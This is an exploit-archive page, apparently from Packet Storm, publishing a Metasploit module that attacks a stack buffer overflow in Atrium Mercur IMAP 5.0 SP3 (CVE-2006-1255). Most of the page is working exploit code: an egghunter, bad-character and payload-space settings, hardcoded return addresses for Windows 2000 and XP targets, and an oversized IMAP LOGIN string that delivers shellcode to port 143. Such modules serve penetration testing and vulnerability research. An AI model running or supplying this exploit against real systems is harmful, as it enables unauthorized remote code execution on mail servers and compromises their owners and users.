what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mercur Messaging 2005 IMAP Login Buffer Overflow

Mercur Messaging 2005 IMAP Login Buffer Overflow
Posted Nov 26, 2009
Authored by MC | Site metasploit.com

This Metasploit module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.

tags | exploit, overflow, imap, shellcode
advisories | CVE-2006-1255
SHA-256 | bcc9986727d1a31fd19c6ec9efeca29335e3bac2e984bdb32e707abede16b9c6

Mercur Messaging 2005 IMAP Login Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3.
Since the room for shellcode is small, using the reverse ordinal payloads
yields the best results.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-1255' ],
[ 'OSVDB', '23950' ],
[ 'BID', '17138' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 228,
'BadChars' => "\x00\x20\x2c\x3a\x40",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],
],
'DisclosureDate' => 'Mar 17 2006',
'DefaultTarget' => 0))

register_options( [ Opt::RPORT(143) ], self.class )
end

def exploit
connect
sock.get_once

hunter = generate_egghunter()
egg = hunter[1]

sploit = "A001 LOGIN " + egg + egg + payload.encoded + hunter[0]
sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV')

print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n")

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close